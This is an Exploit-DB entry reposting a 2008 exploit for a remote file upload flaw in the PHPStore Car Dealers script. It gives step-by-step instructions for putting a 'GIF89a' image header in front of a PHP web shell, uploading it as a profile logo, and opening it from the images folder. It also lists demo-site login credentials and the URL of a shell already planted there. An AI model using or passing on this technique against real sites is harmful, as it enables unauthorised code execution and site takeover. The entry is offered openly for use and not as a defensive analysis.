PHPStore Car Dealers Remote File Upload Vulnerability



EDB-ID: 7082 CVE: 2008-6929OSVDB-ID: 50292
Author: ZoRLuPublished: 2008-11-10Verified: Verified
Exploit Code:   DownloadVulnerable App:   N/A

Rating

(0.0)
Prev Home Next
PHP Store Auto Classifieds Remote File Upload
Author: ZoRLu  msn: trt-turk@hotmail.com
home: www.z0rlu.blogspot.com
N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-----------------------------------------
exploit:
first register to site
you add this code your shell to head
GIF89a;
example your_shell.php:
GIF89a;
<?
...
...
...
?>
and save your_sheell.php
login to site and edit your profile
upload your_shell.php
your_shell.php path:
localhost/script/cars_images/[ID]_logo_your_shell.php
---------------------------------------------
example for demo:
login: http://www.phpstore.info/demos/cars/login.php
user: zorlu
passwd: zorlu1
shell:
http://www.phpstore.info/demos/cars/cars_images/1226241384_logo_c.php
------------------------------------------------
thanks: str0ke & yildirimordulari.org  &  darkc0de.com
# milw0rm.com [2008-11-10]






Comments

No comments so far